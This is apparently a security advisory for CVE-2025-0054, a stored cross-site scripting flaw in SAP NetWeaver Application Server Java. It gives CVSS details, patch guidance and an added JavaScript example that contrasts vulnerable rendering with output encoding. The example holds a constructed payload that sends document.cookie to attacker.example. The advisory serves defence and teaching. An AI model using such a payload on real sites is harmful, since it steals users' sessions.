Description Preview
SAP NetWeaver Application Server Java does not sufficiently validate and encode user-supplied input before it is stored and later rendered, resulting in a stored cross-site scripting (XSS) vulnerability. An attacker with basic (low-privileged) user access can store a JavaScript payload on the server; when another user later views the affected page, the payload executes in that user's browser, allowing the attacker to read or modify information associated with the vulnerable web page in the victim's session. The vulnerability has a CVSS base score of 5.4 (medium): the impacts on confidentiality and integrity are low, and exploitation requires the victim to interact with the page that renders the stored content. The changed scope in the score reflects that the payload runs in the victim's browser rather than in the vulnerable server component.
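The store-then-render pattern behind a stored XSS, modelled as an added example. This is not SAP code and does not reflect the affected NetWeaver component (whose source is not public); the profile field, the in-memory store and the attacker input are all constructed for illustration. It shows the defect (interpolating a stored value straight into HTML) beside the fix (encoding for the HTML element-content context at render time).

```javascript
// Added illustration of the stored-XSS pattern described above; not SAP code.
// Minimal server-side flow: a low-privileged user saves a profile field, and a
// second user's browser later renders it. Names and data are constructed.

// Constructed attacker input, as a low-privileged user might submit it.
const ATTACKER_INPUT =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// In-memory map standing in for the server-side persistence that makes the XSS "stored".
const store = new Map();

function saveDisplayName(userId, value) {
  // Storing the raw value is not the defect in itself; the defect is rendering
  // it later without encoding for the HTML context it lands in.
  store.set(userId, value);
}

// Vulnerable: the stored value is interpolated directly into the markup, so a
// stored <script> element becomes live script in every viewer's browser.
function renderProfileVulnerable(userId) {
  return `<h1>Profile</h1><p class="name">${store.get(userId)}</p>`;
}

// HTML-entity encoding for element content. Attribute values, JavaScript blocks
// and URLs each need their own context-specific encoder; this one is not enough there.
function encodeForHtml(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(s).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Hardened: same template, but the stored value is encoded at the point of output.
function renderProfileHardened(userId) {
  return `<h1>Profile</h1><p class="name">${encodeForHtml(store.get(userId))}</p>`;
}

// Crude check used below: does the markup still contain an unencoded <script start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

saveDisplayName('attacker', ATTACKER_INPUT);
console.log('vulnerable:', renderProfileVulnerable('attacker'));
console.log('hardened  :', renderProfileHardened('attacker'));
```

The encoded output still displays the attacker's text to the viewer, but as inert characters; the payload never becomes a script element. Encoding at output time rather than at storage time is deliberate: the same stored value may later be emitted into an attribute, a JSON response or a URL, and each of those contexts needs a different encoder.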
Overview
- CVE ID: CVE-2025-0054
- Vendor: SAP
- Affected Product: SAP NetWeaver Application Server Java
- Affected Versions: EP-BASIS 7.50, FRAMEWORK-EXT 7.50
- Vulnerability Type: Stored Cross-Site Scripting (XSS)
- CVSS Score: 5.4 (Medium)
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: Required
- Scope: Changed
Remediation
To mitigate CVE-2025-0054, apply the SAP Security Note that addresses it and bring the affected software components (EP-BASIS 7.50 and FRAMEWORK-EXT 7.50) up to the corrected patch level; verify the deployed component versions afterwards rather than assuming the update succeeded. Regularly applying the patches released on SAP Security Patch Day is essential. For the specific correction and patch levels, refer to the SAP Security Patch Day notes and the related SAP support documentation.
References
Industry Exposure (most to least affected)
This section illustrates the prevalence of a specific Common Vulnerabilities and Exposures (CVE) across various industries based on customer reports. The ranking displays industries from the most to least affected by this particular vulnerability, offering insight into where this CVE has been most frequently observed. This information can help organizations within these sectors prioritize their security efforts, understand their relative risk exposure compared to their peers, and focus remediation strategies where they are most needed. By understanding the industry-specific impact, organizations can make more informed decisions regarding patching, resource allocation, and overall risk management related to this CVE.
- Manufacturing: Low
- Accommodation & Food Services: Low
- Administrative, Support, Waste Management & Remediation Services: Low
- Agriculture, Forestry, Fishing & Hunting: Low
- Arts, Entertainment & Recreation: Low
- Construction: Low
- Educational Services: Low
- Finance and Insurance: Low
- Health Care & Social Assistance: Low
- Information: Low
- Management of Companies & Enterprises: Low
- Mining: Low
- Other Services (except Public Administration): Low
- Professional, Scientific, & Technical Services: Low
- Public Administration: Low
- Real Estate Rental & Leasing: Low
- Retail Trade: Low
- Transportation & Warehousing: Low
- Utilities: Low
- Wholesale Trade: Low